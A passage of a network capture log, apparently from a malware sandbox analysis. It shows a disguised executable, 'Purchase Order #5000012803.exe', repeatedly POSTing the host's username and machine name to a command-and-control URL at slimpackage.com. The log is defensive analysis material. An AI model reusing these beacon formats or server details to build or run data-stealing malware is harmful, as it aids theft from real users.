                    44 | 192.168.2.4 | 49873 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:43.379060030 CET | 10901 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:43.544672012 CET | 10902 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:43.675276995 CET | 10902 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    45 | 192.168.2.4 | 49875 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:46.514857054 CET | 10908 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:46.639029980 CET | 10908 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:46.773838043 CET | 10908 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    46 | 192.168.2.4 | 49876 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:49.069116116 CET | 10909 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:49.194155931 CET | 10909 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:49.337191105 CET | 10910 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:48 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    47 | 192.168.2.4 | 49877 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:51.061156988 CET | 10910 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:51.185406923 CET | 10911 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:51.340956926 CET | 10911 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    48 | 192.168.2.4 | 49879 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:53.094090939 CET | 10916 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:53.252428055 CET | 10918 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:53.418189049 CET | 10919 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    49 | 192.168.2.4 | 49882 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:55.310735941 CET | 10922 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:55.472043991 CET | 10922 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:55.646163940 CET | 10922 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:54 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    5 | 192.168.2.4 | 49770 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:21.323362112 CET | 1338 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:21.446059942 CET1338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:21.577928066 CET | 1338 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:20 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    50 | 192.168.2.4 | 49883 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:57.010126114 CET | 10923 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:57.134207010 CET10924OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:57.265400887 CET | 10924 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:56 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    51 | 192.168.2.4 | 49884 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:58.361671925 CET | 10925 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:58.661470890 CET10925OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:58.867147923 CET | 10926 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:57 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    52 | 192.168.2.4 | 49885 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:59.960262060 CET | 10927 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:00.083255053 CET10927OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:00.213871956 CET | 10927 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:59 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    53 | 192.168.2.4 | 49886 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:01.212522984 CET | 10928 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:01.337017059 CET10928OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:01.469331980 CET | 10929 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    54 | 192.168.2.4 | 49887 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:02.582056046 CET | 10930 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:02.704819918 CET10930OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:02.835235119 CET | 10930 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    55 | 192.168.2.4 | 49888 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:03.930332899 CET | 10931 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:04.054950953 CET10931OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:04.186918974 CET | 10931 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    56 | 192.168.2.4 | 49889 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:05.232615948 CET | 10932 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:05.355555058 CET10933OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:05.503925085 CET | 10933 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    57 | 192.168.2.4 | 49890 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:06.577783108 CET | 10934 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:06.700897932 CET10934OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:06.833031893 CET | 10934 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    58 | 192.168.2.4 | 49891 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:07.881860018 CET | 10935 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:08.070202112 CET10935OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:08.206795931 CET | 10936 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    59 | 192.168.2.4 | 49892 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:09.745172977 CET | 10937 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:09.870347977 CET10937OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:10.052268028 CET | 10937 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    6 | 192.168.2.4 | 49771 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:24.359164000 CET | 1339 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:24.483581066 CET1340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:24.616121054 CET | 1340 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    60 | 192.168.2.4 | 49893 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:17:11.929100037 CET | 10938 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:12.055680037 CET10938OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:12.198611021 CET | 10939 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    7 | 192.168.2.4 | 49772 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:25.808697939 CET | 1341 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:25.955164909 CET1341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:26.114744902 CET | 1341 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:24 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    8 | 192.168.2.4 | 49773 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:27.597120047 CET | 1342 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
